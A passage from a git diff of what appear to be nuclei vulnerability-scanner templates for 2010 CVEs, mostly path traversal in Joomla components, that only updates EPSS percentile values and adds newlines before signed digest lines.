b/http/cves/2010/CVE-2010-0944.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-0944 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:thorsten_riess:com_jcollection:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022079c0965d112fbed0d097a86a3c78a7090a987bbcd39ecfa4f57abd47bf48f6ae02202dee158150bfe69a0539ccef5e880b3b5bd7e820f76ff2cce4c3d6e4867e293c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022079c0965d112fbed0d097a86a3c78a7090a987bbcd39ecfa4f57abd47bf48f6ae02202dee158150bfe69a0539ccef5e880b3b5bd7e820f76ff2cce4c3d6e4867e293c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0972.yaml b/http/cves/2010/CVE-2010-0972.yaml index 4565003dbe..eca46fa755 100644 --- a/http/cves/2010/CVE-2010-0972.yaml +++ b/http/cves/2010/CVE-2010-0972.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0972 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79832 + epss-percentile: 0.79821 cpe: cpe:2.3:a:g4j.laoneo:com_gcalendar:2.1.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-0982.yaml b/http/cves/2010/CVE-2010-0982.yaml index 283d25621e..e3c8598f98 100644 --- a/http/cves/2010/CVE-2010-0982.yaml +++ b/http/cves/2010/CVE-2010-0982.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-0982 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.80512 + epss-percentile: 0.805 cpe: cpe:2.3:a:joomlamo:com_cartweberp:1.56.75:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200212685e0860df84441146636126680de927567d723be4a285f5c398961c6d7602204e79eea2787307d7bdfafca015c1942647f64be81a189e12eb9b5f0d31746ee1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200212685e0860df84441146636126680de927567d723be4a285f5c398961c6d7602204e79eea2787307d7bdfafca015c1942647f64be81a189e12eb9b5f0d31746ee1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-0985.yaml b/http/cves/2010/CVE-2010-0985.yaml index 054f5025c5..36ab4100cb 100644 --- a/http/cves/2010/CVE-2010-0985.yaml +++ b/http/cves/2010/CVE-2010-0985.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-0985 cwe-id: CWE-22 epss-score: 0.01222 - epss-percentile: 0.8377 + epss-percentile: 0.83755 cpe: cpe:2.3:a:chris_simon:com_abbrev:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1056.yaml b/http/cves/2010/CVE-2010-1056.yaml index d090cb42ea..b157217aa1 100644 --- a/http/cves/2010/CVE-2010-1056.yaml +++ b/http/cves/2010/CVE-2010-1056.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1056 cwe-id: CWE-22 epss-score: 0.06484 - epss-percentile: 0.92984 + epss-percentile: 0.92977 cpe: cpe:2.3:a:rockettheme:com_rokdownloads:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1081.yaml b/http/cves/2010/CVE-2010-1081.yaml index 6bff6c741a..efa0a4b114 100644 --- a/http/cves/2010/CVE-2010-1081.yaml +++ b/http/cves/2010/CVE-2010-1081.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1081 cwe-id: CWE-22 epss-score: 0.0168 - epss-percentile: 0.8627 + epss-percentile: 0.86279 cpe: cpe:2.3:a:corejoomla:com_communitypolls:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1217.yaml b/http/cves/2010/CVE-2010-1217.yaml index c506ca598e..089d04d94b 100644 --- a/http/cves/2010/CVE-2010-1217.yaml +++ b/http/cves/2010/CVE-2010-1217.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1217 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83238 + epss-percentile: 0.8323 cpe: cpe:2.3:a:je_form_creator:je_form_creator:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1219.yaml b/http/cves/2010/CVE-2010-1219.yaml index 027b7faca3..a78d2ffe63 100644 --- a/http/cves/2010/CVE-2010-1219.yaml +++ b/http/cves/2010/CVE-2010-1219.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1219 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79832 + epss-percentile: 0.79821 cpe: cpe:2.3:a:com_janews:com_janews:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1302.yaml b/http/cves/2010/CVE-2010-1302.yaml index d66c6ca24e..f013a3037c 100644 --- a/http/cves/2010/CVE-2010-1302.yaml +++ b/http/cves/2010/CVE-2010-1302.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1302 cwe-id: CWE-22 epss-score: 0.01204 - epss-percentile: 0.83639 + epss-percentile: 0.83623 cpe: cpe:2.3:a:decryptweb:com_dwgraphs:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022046e18658e1e724518142631406c1c4592268e6b7529c55e4cc4a3b10c198d299022100a8a4df7ecbf32272e79dbd739c47ea49f554e79c6e206dbd59c759c30e9ad35e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022046e18658e1e724518142631406c1c4592268e6b7529c55e4cc4a3b10c198d299022100a8a4df7ecbf32272e79dbd739c47ea49f554e79c6e206dbd59c759c30e9ad35e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1304.yaml b/http/cves/2010/CVE-2010-1304.yaml index ac7181b9e4..b361c56b38 100644 --- a/http/cves/2010/CVE-2010-1304.yaml +++ b/http/cves/2010/CVE-2010-1304.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1304 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72295 + epss-percentile: 0.72287 cpe: cpe:2.3:a:joomlamo:com_userstatus:1.21.16:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1306.yaml b/http/cves/2010/CVE-2010-1306.yaml index a3548aacbd..67907fb0b4 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1306 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83937 + epss-percentile: 0.83919 cpe: cpe:2.3:a:roberto_aloi:com_joomlapicasa2:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 74f6e9c188..52a2e4e3e5 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1307 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86548 + epss-percentile: 0.86555 cpe: cpe:2.3:a:software.realtyna:com_joomlaupdater:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 9beb02b3eb..b20e13f836 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1308 cwe-id: CWE-22 epss-score: 0.01334 - epss-percentile: 0.84559 + epss-percentile: 0.8453 cpe: cpe:2.3:a:la-souris-verte:com_svmap:1.1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index 0d7716cd2b..36733db1b1 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1312 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83238 + epss-percentile: 0.8323 cpe: cpe:2.3:a:ijoomla:com_news_portal:1.5.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index ec30578f69..c5b2cfef4c 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1313 cwe-id: CWE-22 epss-score: 0.0045 - epss-percentile: 0.72295 + epss-percentile: 0.72287 cpe: cpe:2.3:a:seber:com_sebercart:1.0.0.12:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index d87c38361e..064e05a290 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1314 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:joomlanook:com_hsconfig:1.5:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bb1835db1a55bdc20a7ef45f8fc283426a181ae324ee11783a9df1f7ae9ab5e1022100edaa5bfa9b8b37440348e9b37b2b76116b402124d4c36300243f8aa928e826ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100bb1835db1a55bdc20a7ef45f8fc283426a181ae324ee11783a9df1f7ae9ab5e1022100edaa5bfa9b8b37440348e9b37b2b76116b402124d4c36300243f8aa928e826ba:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 51e4770607..d0af5d3fc7 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1315 cwe-id: CWE-22 epss-score: 0.0087 - epss-percentile: 0.80512 + epss-percentile: 0.805 cpe: cpe:2.3:a:joomlamo:com_weberpcustomer:1.2.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220732366ebc615c9ed7a430022aa521d4dab08d8b09e481dfc8ae4252903262627022042855e2f67d5c45a43f1a93f6101056a4230216b9230008e72dd588df3349bec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a004630440220732366ebc615c9ed7a430022aa521d4dab08d8b09e481dfc8ae4252903262627022042855e2f67d5c45a43f1a93f6101056a4230216b9230008e72dd588df3349bec:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index abd29e317d..a564a3f3d1 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1340 cwe-id: CWE-22 epss-score: 0.01155 - epss-percentile: 0.83238 + epss-percentile: 0.8323 cpe: cpe:2.3:a:joomla-research:com_jresearch:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 8c9293f412..eb225032ea 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1345 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:cookex:com_ckforms:1.3.3:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eae33a4d8880bc5d6c37120a554446c0587b8d642981d751a01a4f653949b83b0220693b70f77e38288c6aa8826c10d6d2276646091a2433205b51bc62b19363af66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eae33a4d8880bc5d6c37120a554446c0587b8d642981d751a01a4f653949b83b0220693b70f77e38288c6aa8826c10d6d2276646091a2433205b51bc62b19363af66:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index 10cb58872b..59a0434966 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1352 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:jooforge:com_jukebox:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b8611401bf4f6733ef37d7f299d7bf6ccf95dc270b3ac73818e818133c9a3f76022100d4194dbb6cafc6aec360e3ec8bba6fc50dee9a0799c75a9d7f7878f6e9baf2ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b8611401bf4f6733ef37d7f299d7bf6ccf95dc270b3ac73818e818133c9a3f76022100d4194dbb6cafc6aec360e3ec8bba6fc50dee9a0799c75a9d7f7878f6e9baf2ce:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index ea9604d9e8..c68526ff82 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1353 cwe-id: CWE-22 epss-score: 0.01751 - epss-percentile: 0.86548 + epss-percentile: 0.86555 cpe: cpe:2.3:a:wowjoomla:com_loginbox:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index 365bbe0ce8..28934542c9 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1354 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:ternaria:com_vjdeo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022001c2ec67a93c735e4fb4159075d3cce865dbfcc86fcb3c673331667fae29a53b02205c9ed61809c82ab6431b60513691686a366d0086a402945f98bede6c74ff7819:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022001c2ec67a93c735e4fb4159075d3cce865dbfcc86fcb3c673331667fae29a53b02205c9ed61809c82ab6431b60513691686a366d0086a402945f98bede6c74ff7819:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index e5cd630222..ebea45ecf9 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1429 cwe-id: CWE-264 epss-score: 0.00573 - epss-percentile: 0.75434 + epss-percentile: 0.75423 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:*:cp08:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index 62f14a5c62..6e02a994f8 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1461 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:gogoritas:com_photobattle:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b3961c18db4a21aedd30e97d78a165a11eab451315e7106d5d6262959287365402206b7652da28402ee411c07ceecb72c174bdaf2ac2732065e061d452bede92db6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100b3961c18db4a21aedd30e97d78a165a11eab451315e7106d5d6262959287365402206b7652da28402ee411c07ceecb72c174bdaf2ac2732065e061d452bede92db6e:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 58d5490707..16cda2c3b6 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1469 cwe-id: CWE-22 epss-score: 0.00813 - epss-percentile: 0.79832 + epss-percentile: 0.79821 cpe: cpe:2.3:a:ternaria:com_jprojectmanager:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 31016d1bcc..dfbd2c8a3a 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1470 cwe-id: CWE-22 epss-score: 0.04616 - epss-percentile: 0.91671 + epss-percentile: 0.91659 cpe: cpe:2.3:a:dev.pucit.edu.pk:com_webtv:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index cfadf70414..ebfed62990 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1471 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92527 + epss-percentile: 0.92521 cpe: cpe:2.3:a:b-elektro:com_addressbook:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 5c0a145ef4..d9bfcc7458 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1472 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.92527 + epss-percentile: 0.92521 cpe: cpe:2.3:a:kazulah:com_horoscope:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index 9883471b6a..e1b794c718 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1473 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:johnmccollum:com_advertising:0.25:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c572d101442c9c0488f828b3d006f54a4c94b26e992edff9e9d3779df5a8f494022100da4920c7453e34d83058896925689e69c4e383ec148c0ce350ec1617100523c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100c572d101442c9c0488f828b3d006f54a4c94b26e992edff9e9d3779df5a8f494022100da4920c7453e34d83058896925689e69c4e383ec148c0ce350ec1617100523c3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 2814b93c6d..fc9d9fd8c8 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1474 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83937 + epss-percentile: 0.83919 cpe: cpe:2.3:a:supachai_teasakul:com_sweetykeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index 825d0776ae..591b457539 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1475 cwe-id: CWE-22 epss-score: 0.01242 - epss-percentile: 0.83937 + epss-percentile: 0.83919 cpe: cpe:2.3:a:ternaria:com_preventive:1.0.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index 6f35fcfaaf..a79c4ab5f5 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1476 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90553 + epss-percentile: 0.9055 cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index 36832e3bef..7bf8f04c48 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2010-1478 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.8001 + epss-percentile: 0.79995 cpe: cpe:2.3:a:ternaria:com_jfeedback:1.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022004cbbc1b624f1e47558859755db005beaae9208e98e13803362c6da268a8dae3022100f8b767ddf7abae6592782632005bd36d6a2091673daf7b068e370bc2f3bdd7b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022004cbbc1b624f1e47558859755db005beaae9208e98e13803362c6da268a8dae3022100f8b767ddf7abae6592782632005bd36d6a2091673daf7b068e370bc2f3bdd7b5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index ec6f0a051a..63a1f4ea29 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1491 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:mms.pipp:com_mmsblog:2.3.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220671eb13517acade060ad865ad74beba19783c0af58953f5e04bdfd238e4ba5bb0221008fd6d7208d43fc975caf4e5031116e21fda952a4bb851118f3e0f34537e4a948:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220671eb13517acade060ad865ad74beba19783c0af58953f5e04bdfd238e4ba5bb0221008fd6d7208d43fc975caf4e5031116e21fda952a4bb851118f3e0f34537e4a948:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 197c97bd05..ba1d268010 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1494 cwe-id: CWE-22 epss-score: 0.01827 - epss-percentile: 0.86861 + epss-percentile: 0.86862 cpe: cpe:2.3:a:awdsolution:com_awdwall:1.5.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022013837cb275c88e106f694577c33e60a2bce62e9128c82b63b95f3fed65991f5f02200ddbba66477bc4a3220e8cf809a0f83b70af85e329a62784b4562b0ed6642c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022013837cb275c88e106f694577c33e60a2bce62e9128c82b63b95f3fed65991f5f02200ddbba66477bc4a3220e8cf809a0f83b70af85e329a62784b4562b0ed6642c70:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 3aa858d730..0fd679e8fd 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1495 cwe-id: CWE-22 epss-score: 0.04503 - epss-percentile: 0.91573 + epss-percentile: 0.91559 cpe: cpe:2.3:a:matamko:com_matamko:1.01:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index 9d60dd9326..f8350cf128 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1531 cwe-id: CWE-22 epss-score: 0.01815 - epss-percentile: 0.86804 + epss-percentile: 0.86806 cpe: cpe:2.3:a:redcomponent:com_redshop:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210080868d8263dc6eebde53256178cbac54e311c6fb958d3104a3db6801e7bb6f78022100e016f6517a0dbd26f6f877592ffe43d7972174b68f3bd36c7c481f1a59f3c28c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210080868d8263dc6eebde53256178cbac54e311c6fb958d3104a3db6801e7bb6f78022100e016f6517a0dbd26f6f877592ffe43d7972174b68f3bd36c7c481f1a59f3c28c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index 70fd93090a..57d9770c42 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1532 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73063 + epss-percentile: 0.73053 cpe: cpe:2.3:a:givesight:com_powermail:1.53:*:*:*:*:*:*:* metadata: max-request: 1 @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210097aa7457af25d571d9b771392df388aa9a27bec818a7ea09b486adf4b770bce3022100b57e98f511a2491ca9f70b5a28b7df5806f186030fef0470d92762f017ec6adf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210097aa7457af25d571d9b771392df388aa9a27bec818a7ea09b486adf4b770bce3022100b57e98f511a2491ca9f70b5a28b7df5806f186030fef0470d92762f017ec6adf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index cb69c616cc..7c6082059b 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2010-1533 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78165 + epss-percentile: 0.78153 cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 8162e060a4..b2a14c45db 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1534 cwe-id: CWE-22 epss-score: 0.01228 - epss-percentile: 0.83805 + epss-percentile: 0.8379 cpe: cpe:2.3:a:joomla.batjo:com_shoutbox:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201e44c4bd8d0166740e24c2bceec4359b29f5def81db857a407a646841428ef18022100af66f0bf73f2d9283fbba732be5eb91b42f856eaf2a7b44741a9d3473fc26f98:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201e44c4bd8d0166740e24c2bceec4359b29f5def81db857a407a646841428ef18022100af66f0bf73f2d9283fbba732be5eb91b42f856eaf2a7b44741a9d3473fc26f98:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 46b48cb6d2..db92a165d3 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2010-1535 cwe-id: CWE-22 epss-score: 0.00706 - epss-percentile: 0.78165 + epss-percentile: 0.78153 cpe: cpe:2.3:a:peter_hocherl:com_travelbook:1.0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1540.yaml 